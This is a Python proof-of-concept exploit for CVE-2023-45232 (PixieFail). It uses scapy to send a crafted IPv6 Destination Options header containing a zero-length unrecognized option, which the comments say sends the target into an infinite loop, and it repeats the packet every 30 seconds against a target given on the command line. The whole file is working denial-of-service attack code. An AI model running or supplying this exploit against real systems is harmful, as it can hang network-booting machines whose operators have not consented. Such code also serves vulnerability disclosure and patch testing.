pixiefail-CVE-2023-45232.py

import struct
import argparse
import time

from scapy.packet import Raw
from scapy.layers.inet import UDP
from scapy.layers.inet6 import *
from scapy.all import send, sniff


def send_packet_with_destination_option_header_bug_04(args):
    ip = IPv6(src=args.src, dst=args.target, nh=60)    # next header = IP6_DESTINATION
    # option_code 0x39 & Ip6OptionMask (0xC0) == 0 => unrecognized option, no action specified, we land in the 'default' clause
    # and the code is supposed to just skip it
    # length == 0x00 => we trigger the infinite loop
    crafted_option = Raw(b'\x39\x00') 
    # next header = IP6_NO_NEXT_HEADER
    dest_opt = IPv6ExtHdrDestOpt(nh=59, autopad=0, options=[crafted_option]) 

    pkt = ip/dest_opt
    pkt.show2()

    send(pkt)


def main(args):
    while True:
        print('Sending packet with Destination Options header containing crafted unrecognized option and sleeping 30 seconds...')
        send_packet_with_destination_option_header_bug_04(args)
        time.sleep(30)



if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Proof of concept for CVE-2023-45232.")
    parser.add_argument('--src', type=str, required=False, help='Source IPv6 address to use')
    parser.add_argument('--target', type=str, required=True, help='Target IPv6 address')
    parser.add_argument('--interface', type=str, required=True, help='Name of the network interface to use')
    args = parser.parse_args()

    main(args)